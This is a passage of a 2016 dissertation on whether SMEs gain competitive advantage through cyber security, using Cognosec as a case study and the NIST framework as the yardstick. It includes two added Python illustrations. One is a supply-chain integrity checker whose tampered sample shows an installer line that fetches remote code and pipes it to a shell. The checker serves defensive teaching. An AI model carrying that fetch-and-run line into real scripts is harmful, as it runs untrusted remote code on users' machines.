Can SMEs develop competitive edge through cybersecurity?
Case Study of Cognosec
Dissertation
Submitted by – Alysha Paulsen – S00601824
Submission date – 22/04/2016
ABSTRACT
The research has a two-fold purpose. Firstly, it evaluates the cyber security services provided by the Austrian firm COGNOSEC in light of the NIST framework for cyber security. Secondly, it critically analyzes whether COGNOSEC holds a competitive advantage in the ICT security market and whether it is able to provide the same to its clients. The research first uncovers existing published facts through a literature review. Based on this review, primary data acquisition tools are devised: a survey questionnaire collects quantitative data from COGNOSEC employees, whereas semi-structured interviews with COGNOSEC clients and an ICT industry analyst provide qualitative data. COGNOSEC's service model is compatible with service standards in most cyber security markets. Customers are satisfied and brand equity for the firm is high. COGNOSEC leads the market through service differentiation and provides its SME clients with a cyber security system that integrates with other management systems at firm level. However, the firm can benefit by introducing more post-purchase services and can maintain a sustainable competitive advantage by designing HRM policies to attract the best talent. The research has highlighted the need for cyber security in SMEs. For managers in the cyber security industry, it outlines key recommendations for maintaining a sustainable competitive advantage. To the author's knowledge, no previous study has evaluated a provider's cyber security services under the NIST framework. The study has also shown how cyber security can lead to competitive advantage for SMEs.
Keywords
COGNOSEC, cyber security, SMEs, NIST framework, competitive advantage, Porter's generic strategies
CONTENTS
1. Introduction
1.1 Research Rationale
1.2 Research Aim
1.3 Research Objectives
2. Literature Review
2.1 Cyber security trends in SMEs
2.2 NIST Framework for cyber security evaluation
2.3 Factors affecting efficacy of cyber security services
2.4 Theoretical framework of competitive advantage
2.5 Literature gaps
3. Research Methodology
3.1 Research Philosophy
3.2 Research Approach
3.3 Research Design
3.4 Data Collection
3.4.1 Survey methodology
3.4.2 Interview methodology
3.5 Sampling Strategy
3.6 Reliability & Validity
3.7 Ethical Considerations
4. Findings and Analysis
4.1 Survey Analysis
4.2 Interview Analysis
4.3 Overall Analysis
5. Conclusions and Recommendations
5.1 Conclusion
5.2 Recommendations
5.3 Theoretical and managerial implications
5.4 Future research scope
References
Appendix: Interview questions
Survey Confirmation Letter
Transcripts
Transcript 1
Transcript 2
Transcript 3
Transcript 4
EXHIBITS
Exhibit 1: Cyber security breaches and cost
Exhibit 2: Growth forecasts for cyber security businesses in UK
Exhibit 3: NIST framework
Exhibit 4: NIST implementation plan
Exhibit 5: Porter's Generic Strategies
Exhibit 6: Employees’ perception of COGNOSEC’s cyber security services
Exhibit 7: Which task is COGNOSEC best at?
Exhibit 8: What are core barriers and challenges faced by COGNOSEC?
Exhibit 9: What are some future opportunities for COGNOSEC?
Exhibit 10: COGNOSEC service model reviewed in light of NIST Framework
1. INTRODUCTION
As the world modernizes and the Internet takes up an ever larger place in business, demand for cyber security is rising. Small and Medium Enterprises (SMEs) are not far behind the larger corporations in their search for cyber security solutions and are looking for proactive ways to mitigate the risks of cyber breaches, espionage, data theft and financial fraud. In June 2012, the Director of MI5 noted that the scale of these cyber threats to business is astounding (Harris & Patton, 2014). This growing importance has given rise to a new niche within the IT industry: the cyber security sector. This research seeks to understand how cyber security providers can deliver competitive advantage to their SME clients through service differentiation and cost structures.
1.1 RESEARCH RATIONALE
The extent and magnitude of cybercrime against businesses is increasing at an astonishing rate. Exhibit 1 shows the cyber security breaches reported and the losses incurred by companies as a result. In 2013, SMEs in the UK suffered between GBP 35,000 and 65,000 in losses due to lax security (Valenzano, 2014). Exhibit 2 shows that the business IT security industry is set to grow by GBP 0.6 billion in 2017 (Harris & Patton, 2014), which indicates the increasing demand for cyber security in the SME sector.
Cyber security providers have therefore emerged as key business consultants for SMEs in recent years. While the literature is rife with research on the threats arising from cyber security breaches and their possible solutions (Sangani & Vijayakumar, 2012), little has been said about the profitability (and losses) of investing in cyber security for SMEs. Many SME managers consider cyber security to be simply an insurance cost (Julisch, 2013). But can it be more than insurance? Could it bring competitive advantage to a business? Theorists, industry analysts and policymakers are actively seeking answers to these questions.
This research evaluates the cyber security model of the Austrian company COGNOSEC, which helps local SMEs and other clients manage their security. By identifying the strengths and weaknesses of the model against standardized theoretical frameworks, the researcher reaches a conclusion on whether COGNOSEC is able to provide competitive advantage to its SME clients through cost leadership and service differentiation. Through this analysis, the study establishes the importance of cyber security as a tool for competitive advantage in SMEs.
Exhibit 1: Cyber security breaches and cost
Source: Valenzano (2014)
Exhibit 2: Growth forecasts for cyber security businesses in UK
Source: Harris & Patton (2014)
1.2 RESEARCH AIM
The research aim is to understand the cyber security model of the Austrian firm COGNOSEC and evaluate it against the generic NIST framework for cyber security in order to assess the key strengths and weaknesses of the company's model. On the basis of these strengths and weaknesses, the researcher concludes whether COGNOSEC itself leads market competition, and whether it is able to provide competitive advantage to its SME clients through the services and costs it offers. In other words, the research explores whether COGNOSEC's services can be more than just a security exercise for SME clients and whether they could amplify the profitability of these clients.
1.3 RESEARCH OBJECTIVES
The research objectives are:
To outline the key features of the COGNOSEC cyber security model;
To evaluate the COGNOSEC cyber security model in light of the NIST framework;
To identify the key strengths and weaknesses of the COGNOSEC model; and
To assess whether COGNOSEC is a market leader and whether it can provide competitive advantage to its SME clients on the basis of the cyber security services it offers.
2. LITERATURE REVIEW
In this chapter, the researcher reviews existing trends in the cyber security market by analyzing the demand for cyber security services and customer perceptions of service providers. The NIST framework is then introduced; it is used later in this research to analyze COGNOSEC's service model (see chapter 4). The factors affecting the efficacy of a cyber security model are outlined to acquaint the reader with the key characteristics that can strengthen or weaken a security programme. Finally, competitive advantage is elaborated using theoretical frameworks that are also applied later (in chapter 4) to evaluate COGNOSEC's market performance.
2.1 CYBER SECURITY TRENDS IN SMES
Cyber security threats in the 21st century are not limited to one country or region. The scope of this menace has spread across the globe at an accelerating pace in recent years and has hit the industrial and financial sectors very hard (Harris & Patton, 2014). Threats can come from individual hackers operating at both small and large scale, from groups that pursue activism through hacking, from intelligence agencies and from organized crime (Macdonald et al., 2013). None of these can be considered lesser in magnitude, as each has the capability to hurt organizations in irrecoverable ways (Wamba & Carter, 2014). As the global threat looms larger over the industrial sector, demand for individuals with cyber security skills is rising by as much as 13.2% per year, according to estimates in the Global Information Security Workforce Study conducted by Frost and Sullivan (Henson & Garfield, 2015).
This gives rise to one of the most serious challenges anticipated for the cyber security industry in the coming years (Macdonald et al., 2013). The inability of educational institutions to produce enough graduates with the skills required to combat ever-evolving threats is a dilemma for policymakers (Harris & Patton, 2014). This concern has been echoed by the National Audit Office landscape review of the UK Cyber Security Strategy as well as by the competitive analysis of the UK cyber security sector produced by Wamba & Carter (2014). Cyber security failures are not limited to technological faults; they also result from human failings and security culture (Julisch, 2013). In the UK during 2011 alone, 44 million cyber-attacks were reported, 98% of which were carried out from outside the UK (Harris & Patton, 2014). The total losses resulting from these attacks amount to a staggering GBP 21 billion through intellectual property losses, financial theft and disruption of operations (Macdonald et al., 2013).
Besides the immediate financial and data losses, there are long-term consequences for victim organizations. Once an organization's systems have been breached, it becomes difficult for it to gain the trust of other firms it wishes to do business with (Ruiz-Vanoye et al., 2012). Recent reports suggest that 58% of companies are unwilling to work with such organizations (Harris & Patton, 2014). Despite the increase in cyber security threats of almost 50% each year, the data management efforts of these firms remain ambiguous (Ruiz-Vanoye et al., 2012).
A successfully orchestrated cyber-attack can cost globally operating firms tens of thousands of dollars in damages, in addition to tarnishing the brand name (Leung, 2012). The breach of the Sony PlayStation Network is an example. The UK Information Commissioner's Office later found that the incident was easily avoidable and that the data of thousands of people worldwide could have been safeguarded (Wilkin, 2012). Subsequently, the firm was called before the US Congress and fined GBP 250,000 by the UK regulator. Sony suffered massive distrust from its customer markets (Harris & Patton, 2014).
According to Mowbray (2013), the number of security breaches at both small and large firms increased by almost 50% over the course of a single year. Foreign parties were involved in almost 78% of breaches at larger companies and 63% at small firms (Awasthi, 2015). Despite the willingness of senior management to strengthen cyber security, progress remains slow because budgets are not adjusted accordingly. Breaches connected to employees have been recorded at 84% of large businesses and 57% of small businesses (Johnson, 2013).
The 2013 Information Risk Maturity Index, compiled by PwC and Iron Mountain with the Government Communications Headquarters (GCHQ), states that effective controls can prevent almost 80% of such breaches (Awasthi, 2015). However, 12% of respondents were of the opinion that most security breaches occur because senior management is unwilling to take the issue seriously (Awasthi, 2015).
2.2 NIST FRAMEWORK FOR CYBER SECURITY EVALUATION
The “Framework for Improving Critical Infrastructure Cybersecurity” (hereafter the ‘NIST framework’) was published by NIST in February 2014 (version 1.0) as a comprehensive guideline for developing cyber security for critical infrastructure. It is a generic model presenting standardized steps involved in establishing cyber security in a business, illustrated in exhibit 3. Although written for critical infrastructure, Osborn & Simpson (2015) have shown that the NIST framework is applicable to all types of organizations and industries.
The framework core consists of five functions: Identify, Protect, Detect, Respond and Recover. Each function is sub-divided into categories, and each category into subcategories that describe specific outcomes. The first function, ‘Identify’, is fundamental to laying the foundation for effective use of the framework (Henson & Garfield, 2015). It involves developing an organization-wide understanding of the cyber security risks to systems, assets, data and capabilities (Kagan & Cant, 2014). Its categories are Asset Management, Business Environment, Governance, Risk Assessment and Risk Management Strategy. Next, the ‘Protect’ function is where the actual process of implementation begins: it develops and implements the safeguards that limit the impact of a potential cyber security event on critical infrastructure services (Kurpjuhn, 2015). Its categories are Access Control, Awareness and Training, Data Security, Information Protection Processes and Procedures, Maintenance and Protective Technology; Sangani & Vijayakumar (2012) single out data security, protective technology, awareness and training and access control as the key outcomes. The third function, ‘Detect’, covers the activities that identify the occurrence of a cyber security event in a timely manner. It is the discovery of an event rather than a reaction to it, and this timely discovery is what allows a company to contain the damage. Its categories are Anomalies and Events, Security Continuous Monitoring and Detection Processes. The fourth function, ‘Respond’, is the systematic reaction to the events detected in the previous phase (Sanchez et al., 2008); Response Planning, Communications, Analysis, Mitigation and Improvements are its categories. Finally, ‘Recover’ is remedial rather than preventive (Kurpjuhn, 2015). In this function, any capabilities or services impaired by an attack are restored; it involves Recovery Planning, Improvements and Communications.
Exhibit 4 shows the roadmap for implementation of the NIST framework. It proposes a hierarchical model with the executive level at the top, followed by business/process managers and finally implementation/operations personnel. The executive level sets the mission priorities, available resources and overall risk tolerance for implementation. The business/process level translates these into a risk assessment and assigns tasks to the operational teams. On-the-ground implementation is assigned to the implementation/operations level, which reports progress back to business management, which in turn reports to the executive level (Goucher, 2011). This arrangement allows grass-roots implementation of the framework and continuous improvement of the process. The roadmap also enables company-wide integration of the mechanism into company operating policy (Leung, 2012).
Other cyber security frameworks, such as those discussed by Goucher (2011) and Leung (2012), prescribe the tools and techniques to be employed to achieve each objective of the cyber security process. The NIST framework differs in that it lists the outcome for each function and leaves the user free to choose the tools to reach that outcome. Kurpjuhn (2015) notes that some organizations may be disappointed that the framework does not show the ‘how’ of achieving the objectives. Nonetheless, for each subcategory the framework points to informative references in existing standards (for example ISO/IEC 27001, COBIT and NIST SP 800-53) to help the user reach the end goal. Goucher (2011) believes that the NIST framework can also serve as an ‘enterprise architecture’, i.e. it can work in parallel with the business model or be integrated into the overall business model itself. It also includes features of risk management, planning and mitigation (Leung, 2012).
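The framework's intended use, comparing a Current Profile against a Target Profile and ranking the resulting gaps by function, is the same exercise this dissertation performs on COGNOSEC's service model in chapter 4. The following Python script is an added illustration of that comparison; it is not code from the dissertation, from NIST or from COGNOSEC. The function and category identifiers are those of framework version 1.0, whereas the 0-4 scoring scale, the uniform target level of 3 and the sample assessment of a hypothetical SME service offering are assumptions constructed for the example.

```python
"""Gap analysis of a service model against the NIST Cybersecurity Framework Core.

Added illustration, not material from the dissertation or from COGNOSEC.
The Framework's own method is to compare a Current Profile with a Target
Profile and rank the gaps by Function.  Function and category identifiers
are those of Framework v1.0; the 0-4 scoring scale and the sample
assessment at the bottom are assumptions constructed for this example.
"""

# Framework Core v1.0: (function, category id, category name).
CORE = [
    ("Identify", "ID.AM", "Asset Management"),
    ("Identify", "ID.BE", "Business Environment"),
    ("Identify", "ID.GV", "Governance"),
    ("Identify", "ID.RA", "Risk Assessment"),
    ("Identify", "ID.RM", "Risk Management Strategy"),
    ("Protect", "PR.AC", "Access Control"),
    ("Protect", "PR.AT", "Awareness and Training"),
    ("Protect", "PR.DS", "Data Security"),
    ("Protect", "PR.IP", "Information Protection Processes and Procedures"),
    ("Protect", "PR.MA", "Maintenance"),
    ("Protect", "PR.PT", "Protective Technology"),
    ("Detect", "DE.AE", "Anomalies and Events"),
    ("Detect", "DE.CM", "Security Continuous Monitoring"),
    ("Detect", "DE.DP", "Detection Processes"),
    ("Respond", "RS.RP", "Response Planning"),
    ("Respond", "RS.CO", "Communications"),
    ("Respond", "RS.AN", "Analysis"),
    ("Respond", "RS.MI", "Mitigation"),
    ("Respond", "RS.IM", "Improvements"),
    ("Recover", "RC.RP", "Recovery Planning"),
    ("Recover", "RC.IM", "Improvements"),
    ("Recover", "RC.CO", "Communications"),
]
FUNCTIONS = ["Identify", "Protect", "Detect", "Respond", "Recover"]
CATEGORY_IDS = {cid for _, cid, _ in CORE}
MAX_SCORE = 4  # assumed scale: 0 = not addressed ... 4 = implemented and measured


def build_profile(assessment, default=0):
    """Expand a partial {category_id: score} map into a full profile.

    Unknown identifiers are rejected rather than silently dropped, and
    categories the assessment omits score `default`, so a gap cannot
    disappear simply because nobody filled the row in.
    """
    unknown = set(assessment) - CATEGORY_IDS
    if unknown:
        raise ValueError(f"not in the Framework Core: {sorted(unknown)}")
    bad = {k: v for k, v in assessment.items() if not 0 <= v <= MAX_SCORE}
    if bad:
        raise ValueError(f"scores outside 0..{MAX_SCORE}: {bad}")
    return {cid: assessment.get(cid, default) for cid in CATEGORY_IDS}


def function_coverage(profile):
    """Mean category score per Function, as a percentage of MAX_SCORE."""
    coverage = {}
    for fn in FUNCTIONS:
        scores = [profile[cid] for f, cid, _ in CORE if f == fn]
        coverage[fn] = round(100 * sum(scores) / (len(scores) * MAX_SCORE), 1)
    return coverage


def weakest_function(profile):
    """The Function with the lowest coverage (first in Core order on a tie)."""
    coverage = function_coverage(profile)
    return min(FUNCTIONS, key=lambda fn: coverage[fn])


def gap_report(current, target):
    """Categories where the Current Profile falls short of the Target Profile,
    largest shortfall first (ties in identifier order), as tuples of
    (category_id, function, name, current, target, gap)."""
    rows = []
    for fn, cid, name in CORE:
        gap = target[cid] - current[cid]
        if gap > 0:
            rows.append((cid, fn, name, current[cid], target[cid], gap))
    rows.sort(key=lambda r: (-r[5], r[0]))
    return rows


# Constructed sample: a hypothetical SME-focused service offering scored by
# its provider.  Any category left out would default to 0 and show as a gap.
SAMPLE_CURRENT = build_profile({
    "ID.AM": 3, "ID.BE": 2, "ID.GV": 3, "ID.RA": 4, "ID.RM": 3,
    "PR.AC": 4, "PR.AT": 3, "PR.DS": 3, "PR.IP": 3, "PR.MA": 2, "PR.PT": 4,
    "DE.AE": 3, "DE.CM": 4, "DE.DP": 3,
    "RS.RP": 3, "RS.CO": 2, "RS.AN": 3, "RS.MI": 3, "RS.IM": 1,
    "RC.RP": 2, "RC.IM": 1, "RC.CO": 1,
})
# Assumed Target Profile: every category at level 3.
SAMPLE_TARGET = build_profile({}, default=3)

if __name__ == "__main__":
    for fn, pct in function_coverage(SAMPLE_CURRENT).items():
        print(f"{fn:<9}{pct:5.1f}%")
    print("weakest function:", weakest_function(SAMPLE_CURRENT))
    for cid, fn, name, cur, tgt, gap in gap_report(SAMPLE_CURRENT, SAMPLE_TARGET):
        print(f"{cid} {fn:<8} {name:<32} {cur} -> {tgt} (gap {gap})")
```

Run as a script it prints the per-function coverage, names the weakest function and lists the prioritized gaps. With the constructed sample the Recover function comes out lowest and the three largest gaps all sit in the Respond and Recover improvement and communication categories, which is the same kind of post-purchase shortfall the abstract identifies for COGNOSEC.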
Exhibit 3: NIST framework
Exhibit 4: NIST implementation plan
2.3 FACTORS AFFECTING EFFICACY OF CYBER SECURITY SERVICES
According to Kagan & Cant (2014), cyber security can be envisioned as an ‘arms race’ between attackers and defenders. ICT systems tend to be very complex, and any inherent weakness or loophole in their programming can allow attackers to enter the system and wreak havoc (Kurpjuhn, 2015). While defenders strive to close these loopholes, they face certain challenges.
Firstly, ‘insiders’ with access to the system pose a great risk (Boyer & McBride, 2009). Jennex & Addo (2004) term this the ‘human factor’ in cyber security. Kurpjuhn (2015) notes that human factors can have a considerable impact on a company's cyber security outcomes despite state-of-the-art software and mechanisms protecting its ICT systems. Leung (2012) further warns that external threats are perhaps not as important as internal ones, and that companies should spend more on internal threat mitigation instead of investing in biometrics, smart cards and the like. Kurpjuhn (2015) explains that these threats need not stem from employees' malicious intentions against the company but may simply result from user carelessness, errors and omissions, and relaxed standard operating procedures regarding data security.
Ruiz-Vanoye et al. (2012) note that ‘supply chain vulnerabilities’ can also compromise an organization's cyber security. These vulnerabilities can permit attackers to insert malicious software (and/or hardware) into products during acquisition. Goucher (2011) notes that management of both the ‘physical’ and the ‘informational’ supply chain is therefore necessary to minimize these vulnerabilities. In addition, Julisch (2013) contends that the human factor compounds supply chain vulnerabilities, since insiders can exploit these weaknesses to obtain sensitive data from company systems.
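Goucher's point about managing the informational supply chain has a concrete form that the dissertation does not spell out: checking that what a supplier delivers is exactly what was reviewed and approved. The following Python script is an added illustration and is not code from the dissertation, from COGNOSEC or from any cited author. It pins the SHA-256 digest of each approved artifact in a manifest and refuses a delivery in which a file was altered, is missing or was added. The file names, file contents, the manifest and the tampering shown are all constructed for the example.

```python
"""Integrity check of acquired software against a pinned manifest.

Added illustration, not material from the dissertation or from COGNOSEC.
It shows one concrete control for the 'informational supply chain': the
purchaser records the SHA-256 digest of every vendor artifact at the time
it was reviewed and approved, and anything delivered or installed later
must match that record.  A package altered at the supplier, in transit or
on a download mirror then fails verification before it is ever run.
All file names and contents below are constructed for the example.
"""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_manifest(text: str) -> dict:
    """Parse '<sha256 hex>  <file name>' lines (the layout sha256sum writes).

    Blank lines and '#' comments are ignored; anything else that is not a
    64-character hex digest followed by a name is an error, because a
    manifest that cannot be trusted is worse than none.
    """
    manifest = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"manifest line {lineno}: expected '<digest>  <name>'")
        digest, name = parts[0].lower(), parts[1].strip()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"manifest line {lineno}: bad SHA-256 digest")
        if name in manifest:
            raise ValueError(f"manifest line {lineno}: duplicate entry for {name}")
        manifest[name] = digest
    return manifest


def verify_delivery(manifest: dict, delivered: dict) -> dict:
    """Compare each delivered artifact (name -> bytes) with the manifest.

    Returns {name: status} with status one of:
      'ok'        digest matches the approved record
      'tampered'  content differs from what was approved
      'missing'   listed in the manifest but not delivered
      'unlisted'  delivered but never approved (must not be installed)
    """
    status = {}
    for name, expected in manifest.items():
        if name not in delivered:
            status[name] = "missing"
            continue
        actual = sha256_hex(delivered[name])
        # compare_digest avoids leaking the match position through timing.
        status[name] = "ok" if hmac.compare_digest(actual, expected) else "tampered"
    for name in delivered:
        if name not in manifest:
            status[name] = "unlisted"
    return status


def safe_to_install(status: dict) -> bool:
    """Install only when every approved artifact is present and intact and
    nothing unexpected has been slipped into the delivery."""
    return all(s == "ok" for s in status.values())


# --- constructed sample -------------------------------------------------
# Copies reviewed and approved by the purchaser; the manifest is built from
# these, in the layout sha256sum would write.
APPROVED = {
    "agent-1.4.2.tar.gz": b"\x1f\x8b release build of the endpoint agent",
    "install.sh": b"#!/bin/sh\ntar xzf agent-1.4.2.tar.gz && ./agent/setup\n",
}
MANIFEST_TEXT = "# approved 2016-03 by security review\n" + "".join(
    f"{sha256_hex(data)}  {name}\n" for name, data in APPROVED.items()
)

# What the supplier (or a mirror) actually delivered: the installer has
# gained a line and an extra file has appeared.  Address is a documentation
# address (RFC 5737), used here only to make the tampering visible.
DELIVERED_TAMPERED = {
    "agent-1.4.2.tar.gz": APPROVED["agent-1.4.2.tar.gz"],
    "install.sh": APPROVED["install.sh"] + b"curl http://203.0.113.9/p | sh\n",
    "update-helper.sh": b"#!/bin/sh\n# not part of the approved release\n",
}

if __name__ == "__main__":
    manifest = parse_manifest(MANIFEST_TEXT)
    print(verify_delivery(manifest, APPROVED))  # every entry 'ok'
    result = verify_delivery(manifest, DELIVERED_TAMPERED)
    print(result, "install:", safe_to_install(result))
```

The check only proves that the delivery matches what was approved; it says nothing about whether the approved copy was itself clean, which is why the review step that produces the manifest still matters. A signed manifest (for instance one verified with the supplier's public key) closes the remaining gap of an attacker who can alter both the files and the digest list.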
Recently, another factor that was previously not well known has been identified. Termed the ‘zero-day’, it refers to a vulnerability for which no fix exists (Harris & Patton, 2014). The vendor does not know of the ‘security hole’ and attackers discover it before the vendor does, which leads to exploitation if the vendor is unable to close the hole before attackers get to it (Kozik & Choras, 2013). Zero-day attacks are therefore largely ‘unknown’ in nature. Many large IT firms have had to suffer embarrassing zero-day attacks themselves or have seen their clients suffer them. In 2013, Oracle released two emergency patches for Java to cover critical vulnerabilities (Sangani & Vijayakumar, 2012). Similarly, a highly sophisticated exploit was found that bypassed the defences of Adobe (Acrobat) Reader 10 and 11 on both Windows and Mac devices (Valenzano, 2014).
Another important factor found to affect cyber security in SMEs is leadership and cyber skills. Julisch (2013) found that a majority of participants reported internal cyber security skill shortages in their organizations. Some respondents also said that management was not keen on investing in cyber security because it often did not perceive the scope of the threat (Leung, 2012). These findings show that both organizational leadership and the internal skill set are important in advancing cyber security within an organization. Besides these factors, regulatory frameworks, industry awareness, the nature of the business and the level of threat also determine the effectiveness of cyber security models in organizations (Harris & Patton, 2014).
2.4 THEORETICAL FRAMEWORK OF COMPETITIVE ADVANTAGE
In his theory of generic strategies, Michael Porter (1985) grounds competitive advantage in the value a firm creates for its buyers (see exhibit 5). When the value created exceeds the cost of creating it, or when similar benefits are offered at lower prices than the competition, the firm is said to have a competitive advantage (Hitt et al., 2012). Cost leadership and differentiation are the two most common forms.
The type of competitive advantage and the scope chosen by a firm dictate its position in the market (Grundy & Moxom, 2013). Strategic positions are characterized at both narrow and broad levels through the generic strategies, with competitive scope distinguishing broad from narrow segments. Each option carries risks, but it is important to choose a strategy in order to excel (Joyce, 2015). According to the framework presented by Grundy & Moxom (2013), product leadership, operational excellence and/or customer intimacy can also serve as foundations of competitive advantage.
Another theory that seeks to explain competitive advantage is the resource-based view (RBV). Both internal and external industry aspects are integrated through the RBV. According to Hill et al. (2014), under the RBV resources differ for each company, as firms are likely to have entirely different physical and intangible assets and capacities. This is similar to the core competency and capability frameworks (Grundy & Moxom, 2013). Resources may be physical, in the form of property or finances; intangible, such as information and skills; or organizational, in the form of processes. Ownership of such resources is the basis of competitive advantage. As each firm differs in its staff, expertise, processes and experience, the resources of each company also differ, and by deploying their resources and capabilities firms can achieve competitive advantage (Joyce, 2015).
In the USD 75 billion cyber security industry, service differentiation is a key strategy for business growth as new threats keep emerging (Osborn & Simpson, 2015). Currently, the highest growth rates are estimated in the security analytics, threat intelligence and cloud security domains (Johnson, 2013). Demand for cyber security is especially high in the retail segment and the general e-commerce market (Mowbray, 2013). According to Ali et al. (2013), investors are now looking for ICT security solutions that integrate with other organizational functions and provide larger, multi-dimensional solutions.
Exhibit 5: Porter's Generic Strategies
Source: Porter, 1985
2.5 LITERATURE GAPS
It is an undeniable fact that the cyber problem is bigger than ever. With an estimated global e-commerce value of USD 572 billion, the cyber realm offers lucrative opportunities to a new generation of scammers and white-collar criminals (Henson & Garfield, 2015). While much has been said about the cyber security risks of the 21st century and their solutions, the available literature is largely silent on how cyber security insurance and investment can be turned into competitive advantage for a company. Moreover, case studies showing the core strengths of cyber security services valued by SME clients are absent. It is necessary to explore this subject from the viewpoint of SMEs as clients of security providers, since they will be the largest investors in the coming age of cyber security. Therefore, this research aims to fill these gaps by conducting a case study of a prominent cyber security firm and generating data to understand the competitive advantage that cyber security systems provide to SME clients.
Exhibit 5 (text rendering of Porter's generic strategies matrix):

                      COMPETITIVE ADVANTAGE
COMPETITIVE SCOPE     Lower Cost             Differentiation
Broad Target          1. Cost Leadership     2. Differentiation
Narrow Target         3A. Cost Focus         3B. Differentiation Focus
3. RESEARCH METHODOLOGY
This chapter covers the research philosophy, the approach adopted and the research design. It also explains the process used to collect the data and the process used to analyze it, and highlights the ethical considerations that must be taken into account during the research.
3.1 RESEARCH PHILOSOPHY
In order to reach reliable conclusions, researchers suggest the use of multiple integrative approaches instead of a single approach (Silverman, 2013). Moreover, directive approaches should be retraced in order to obtain more reliable and authentic results (Yin, 2014). To achieve this, the researcher applies the ‘interpretivist’ philosophy. Under interpretivism, the researcher analyzes the various elements of a study in order to interpret them; this interpretation involves scrutinizing reality in order to formulate relevant conclusions, and it focuses on integrating the human element within the research. Interpretive researchers assume that there are structures even in social realities, such as shared definitions, language, consciousness and instruments (Myers, 2009), and accordingly they try to interpret these structures for the purposes of analysis. The interpretivist philosophy was initially developed as a critique of positivism in the social sciences.
According to Yin (2014), the best methodology is to avoid personal involvement when analyzing the problem and to use multi-dimensional analyses to reach conclusions. Therefore, the researcher has applied a variety of approaches to target the issue from both qualitative and quantitative angles using primary research methods.
3.2 RESEARCH APPROACH
Chapter 1 states the aim of this research: to analyze the cyber security model of COGNOSEC and evaluate it against the NIST framework, as well as to evaluate the competitive advantage of this model. Towards this end, the researcher primarily targets company stakeholders, including customers/clients and employees, and also involves IT security industry analysts. In addition, the study puts forward suggestions and recommendations that will help strengthen COGNOSEC's competitive advantage in the market and allow SMEs to develop the same using cyber security frameworks. To achieve the aims and objectives set out in chapter 1, the researcher has found the inductive approach most suitable. To gain a more in-depth understanding of the subject under investigation, both qualitative and quantitative evaluation has been conducted, enabling the researcher to explore the subject from various angles. The data gathered with the primary research tools are then studied in light of the literature published on the subject (see chapter 2). The main benefit of an inductive approach is the opportunity for generalization it allows: the results of the study can be generalized to the wider cyber security industry and the SME sector.
3.3 RESEARCH DESIGN
Research design is important because it sets out the path to be followed in collecting the required data and reaching reasonable conclusions. Research designs can be classified as exploratory, applied or descriptive (Yin, 2014). To study this subject in greater detail, the researcher has opted for an exploratory research design (Creswell, 2009). The purpose of an exploratory design is to touch upon subjects that are yet to be studied in detail, so that the researcher can add information previously missing from the literature. Opinion among researchers on the choice of approach is divided: according to Collis & Hussey (2003), the best means to understand a given subject is through direct research, whereas the use of case studies is favored by Silverman (2013) and supported by Yin (2014). In addition to the case study approach, Collis (2003), Saunders (2007) and Jackson (2014) suggest integrating a qualitative approach alongside it. Therefore, this research uses a case study design together with qualitative research to achieve its objectives.
3.4 DATA COLLECTION
To identify the literature gaps and set the direction for research, the researcher began by conducting
literature review of published findings. Here, academic documents (from books, journals and other
sources), company reports, periodicals and government findings were analyzed. This set of
information constituted secondary data. Silverman (2013) defines secondary data as the material
that has already been published and known.
Based on this secondary data, the researcher then set the context for primary research. Primary
research is used to address the gaps identified through literature review (see section 2.5). For this
research, the researcher chose two primary research tools: survey questionnaire and semi-
structured interviews. The former tool allowed gathering of quantitative data that was analyzed
using statistical software (MS Excel). Myers (2009) notes that quantitative data can play a major
role in scientific research as it allows measurement and standardization of findings. It also helps
strengthen researcher’s argument(s) by providing concrete supportive arguments (Miller & Miller,
2010).
3.4.1 SURVEY METHODOLOGY
For the survey questionnaire, a set of four questions based on MCQs (Likert scale) was designed.
Open-ended and close-ended questions were included. In some questions, only one possible option
choice was provided whereas in others, more than one option could be selected. This decision was
based on the nature of question. The surveys were conducted with a total of 12 COGNOSEC
employees serving in managerial as well as technical/operational positions. A small sample
was taken, as most of the employees working for COGNOSEC are not allowed to share
their views or opinions due to legal reasons. All respondents were males (as COGNOSEC
employees are largely male). Employees were first briefed about the survey and then sent the
questions through an online portal of COGNOSEC. Additional comments of employees were also
noted where relevant and provided. Note here that survey questions were technical in nature as
COGNOSEC employees were well aware of the terminologies and technicalities of cyber security
domain. The survey exercise was only conducted with employees and was aimed at achieving the
first two research objectives (see section 1.3 in chapter 1). In other words, surveys were meant to
explore the strengths and weaknesses as well as opportunities of the COGNOSEC cyber security
service model. The survey questions are listed in chapter 4, section 4.1. Due to COGNOSEC's data
protection policy, the survey file used to collect the findings is not attached in the appendix section.
3.4.2 INTERVIEW METHODOLOGY
For the semi-structured interviews, four open-ended questions were devised. These interviews
were conducted face-to-face with four respondents. Three of the respondents represented former
COGNOSEC clients. They were SME representatives from retail, e-commerce and business
consultancy sectors. The fourth respondent was a local IT security industry analyst who was
included in the panel to diversify opinion. Due to the respondents' busy schedules and data protection
limitations, each interview took approximately 15 minutes. Interviews were aimed at achieving
objectives 3 and 4 (see section 1.3 of chapter 1). In other words, COGNOSEC clients and industry
analyst were involved to gather opinion on competitive advantage of the COGNOSEC cyber
security services for both the company and its clients. The findings of both survey and interview
research are presented in chapter 4 along with a detailed analysis based on secondary research.
3.5 SAMPLING STRATEGY
According to Yin (2014), population is comprised of the people who will be affected due to the
subject that is studied in the research. In most research, it is an arduous endeavor to
scrutinize the entire population which has been impacted. As a result, researchers
normally acquire samples which represent the population so that the findings can be generalized.
In this research, the purposive sampling method is used to choose the participants for the sample.
Thus, 12 managers of COGNOSEC were selected for the survey, while managers from four SMEs
among COGNOSEC's clients were selected for the interviews.
3.6 RELIABILITY & VALIDITY
The research's validity concerns whether the researcher managed to satisfy the objectives.
For this study, reliability was ensured by checking whether the results from the interviews were complete and
consistent. This was done by checking the recordings and the notes multiple times. Answers
were also verified, and information on how to contact the participants was kept, with their consent,
in case follow-ups were needed. The validity of the answers was ensured by asking
the questions to the relevant employees.
3.7 ETHICAL CONSIDERATIONS
According to Yin (2014), ensuring the safety, comfort and privacy of all participants involved is
the responsibility of the researcher. Therefore, for this research, all legal and regulatory aspects
have been taken into account. Moreover, each participant was individually informed of the benefits
and requirements of participating in the study and of what the surveys and
interviews would focus on. No participant was approached without prior consent, and the data
collected from them was only published after taking them into confidence regarding the
